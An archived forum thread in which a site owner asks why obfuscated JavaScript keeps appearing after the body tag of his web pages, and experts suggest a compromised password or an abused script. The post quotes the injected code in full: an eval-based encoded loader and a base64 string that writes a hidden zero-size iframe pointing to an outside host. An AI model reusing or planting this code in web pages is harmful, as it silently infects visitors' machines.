Injecting Javascript code in webpage after body tag. which download maliculous script into system

Posted on 2008-10-13
Last Modified: 2013-11-16
I don't know what's happening with my web server and websites. Somebody injecting some javascript code into the webpages after the body tag. When someone try to open the websiet it downloads the scripts and inject into the system. I tried to delete all hosted website and uploaded it again but no luck.
Could someone suggest me on this....
Here is the sample code of that javascript : -
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG')	</script><!-- --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");

Open in new window

Question by:itindia
  • 2
  • 2
  • 2
  • +1
LVL 21

Expert Comment

ID: 22702413
when you say someone, you mean your webhost or another programmer?

Author Comment

ID: 22702461
Thanks for the quick reply!! But I don't know who is the culprit as i am the only person who has the access of the websites, i meant by "Someone" that there could be a Hijacker or may me some virus who has attacked on my websites.
LVL 23

Accepted Solution

Tiggerito earned 63 total points
ID: 23103305
Is the injected code directly in an html file on the server? i.e. is it being directly changed on the server.

It could be related to the iframe attach...

Its initially based onfinding a password to access to the server. From there it alters website pages to do bad things.

Optimizing Cloud Backup for Low Bandwidth

With cloud storage prices going down a growing number of SMBs start to use it for backup storage. Unfortunately, business data volume rarely fits the average Internet speed. This article provides an overview of main Internet speed challenges and reveals backup best practices.


Assisted Solution

DrAtomic earned 62 total points
ID: 23371507

Author Comment

ID: 23371693
yes Tiggerito Its directly injected on the server, no user modification has been done. Its spreading the code in all HTMl, ASP and PHP files located in the server in which the  tag is exists. Basically its a virus, If someone opens the website that code execute and pointed to another URL and make your PC un-responding.

No way you can stop it but to press ESC before executing or you have to do a system restore.

I keep removing the codes from files but after some days the same thing will happen.

LVL 23

Expert Comment

ID: 23381528
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.

You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.


Expert Comment

ID: 23383001
Most likely your server isn't compromised but one of your scripts is being abused, the abused script will have access to all files under the same user account. Start by giving each domain it's own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself then apply Tiggerito his suggestion.

Featured Post

Are your AD admin tools letting you down?

Managing Active Directory can get complicated.  Often, the native tools for managing AD are just not up to the task.  The largest Active Directory installations in the world have relied on one tool to manage their day-to-day administration tasks: Hyena. Start your trial today.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
help squeezing some space out in this site 9 34
maps stopped work unsure why 7 36
HTML5 save .Dat to server side 20 48
Decoding Special HTML Characters using Javascript? 2 29
If you thought ransomware was bad, think again! Doxware has the potential to be even more damaging.
The article shows the basic steps of integrating an HTML theme template into an ASP.NET MVC project
In this tutorial viewers will learn how to embed an audio file in a webpage using HTML5. Ensure your DOCTYPE declaration is set to HTML5: : The declaration should display (CODE) HTML5 is supported by the most recent versions of all major browsers…
The viewer will learn the benefit of using external CSS files and the relationship between class and ID selectors. Create your external css file by saving it as style.css then set up your style tags: (CODE) Reference the nav tag and set your prop…

803 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question